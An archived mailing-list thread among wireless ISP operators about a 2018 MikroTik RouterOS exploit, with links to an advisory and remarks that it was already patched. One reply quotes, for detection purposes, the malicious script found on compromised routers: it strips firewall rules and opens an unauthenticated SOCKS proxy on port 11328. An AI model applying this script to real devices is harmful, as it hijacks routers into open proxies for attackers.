Mikrotik themselves also has published several security bulletins on their 
newsletter list.  If your not on it, go to mikrotik.com and scroll to the 
bottom and sign up for the newsletter.

Brian


________________________________
From: 20153514200n behalf of
Sent: Tuesday, August 7, 2018 8:34 AM
To: Dennis Burgess; Mikrotik Users
Subject: Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

How does one subscribe to your news letter?
Alex Phillips
CEO and General Manager
RBNS.net
HighSpeedLink.net
540-908-3993



On Tue, Aug 7, 2018 at 9:29 AM Dennis Burgess via Mikrotik-users 
<mikrotik-users@wispa.org<mailto:mikrotik-users@wispa.org>> wrote:
You should subscribe to our newsletters as we mentioned this several weeks 
ago….  This is the exploit that was fixed back 4 months ago!  Lol


Dennis Burgess, Mikrotik Certified Trainer
Author of "Learn RouterOS- Second Edition”
Link Technologies, Inc -- Mikrotik & WISP Support Services
Office: 314-735-0270  Website: 
http://www.linktechs.net<http://www.linktechs.net/>
Create Wireless Coverage’s with 
www.towercoverage.com<http://www.towercoverage.com>

From: mikrotik-users-boun...@wispa.org<mailto:mikrotik-users-boun...@wispa.org> 
<mikrotik-users-boun...@wispa.org<mailto:mikrotik-users-boun...@wispa.org>> On 
Behalf Of Bruce Bridegwater via Mikrotik-users
Sent: Sunday, August 5, 2018 8:16 PM
To: 'Shawn C. Peppers' 
<videodirectwispal...@gmail.com<mailto:videodirectwispal...@gmail.com>>; 
'Mikrotik Users' <mikrotik-users@wispa.org<mailto:mikrotik-users@wispa.org>>; 
Bob Pensworth <beeper.bo...@gmail.com<mailto:beeper.bo...@gmail.com>>
Cc: JP Douros <jdou...@rpmcable.com<mailto:jdou...@rpmcable.com>>
Subject: Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

Fyi, credit to J.P. Douros from RPM Provioning Management for bringing it to 
our attention and providing the solution.
RPM manages our Cisco UBR10k CMTS.
Great support company.
________________________________
From: mikrotik-users-boun...@wispa.org<mailto:mikrotik-users-boun...@wispa.org> 
<mikrotik-users-boun...@wispa.org<mailto:mikrotik-users-boun...@wispa.org>> on 
behalf of Bob Pensworth via Mikrotik-users 
<mikrotik-users@wispa.org<mailto:mikrotik-users@wispa.org>>
Sent: Sunday, August 5, 2018 7:57:53 PM
To: 'Shawn C. Peppers'; 'Mikrotik Users'
Subject: Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

We are finding an IP/Socks connection:
We are finding an event entry in System/Scheduler
And the (below) script in System/Script:

/ip firewall filter remove [/ip firewall filter find where comment ~ "port 
[0-9]*"];/ip socks set enabled=yes port=11328 max-connections=255 
connection-idle-timeout=60;/ip socks access remove [/ip socks access find];/ip 
firewall filter add chain=input protocol=tcp port=11328 action=accept 
comment="port 11328";/ip firewall filter move [/ip firewall filter find 
comment="port 11328"] 1;

--
Bob Pensworth, WA7BOB | General Manager
CresComm WiFi, LLC<http://www.crescommwifi.com/> | (360) 928-0000, x1

From: mikrotik-users-boun...@wispa.org<mailto:mikrotik-users-boun...@wispa.org> 
<mikrotik-users-boun...@wispa.org<mailto:mikrotik-users-boun...@wispa.org>> On 
Behalf Of Shawn C. Peppers via Mikrotik-users
Sent: Friday, March 16, 2018 11:54 AM
To: mikrotik-users@wispa.org<mailto:mikrotik-users@wispa.org>; 
memb...@wisp.org<mailto:memb...@wisp.org>
Subject: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

I have not tested this yet but....

https://www.coresecurity.com/advisories/mikrotik-routeros-smb-buffer-overflow
:: // Shawn Peppers
:: // DirectlinkAdmin.com<http://DirectlinkAdmin.com>
_______________________________________________
Mikrotik-users mailing list
Mikrotik-users@wispa.org<mailto:Mikrotik-users@wispa.org>
http://lists.wispa.org/mailman/listinfo/mikrotik-users
_______________________________________________
Mikrotik-users mailing list
Mikrotik-users@wispa.org
http://lists.wispa.org/mailman/listinfo/mikrotik-users

Reply via email to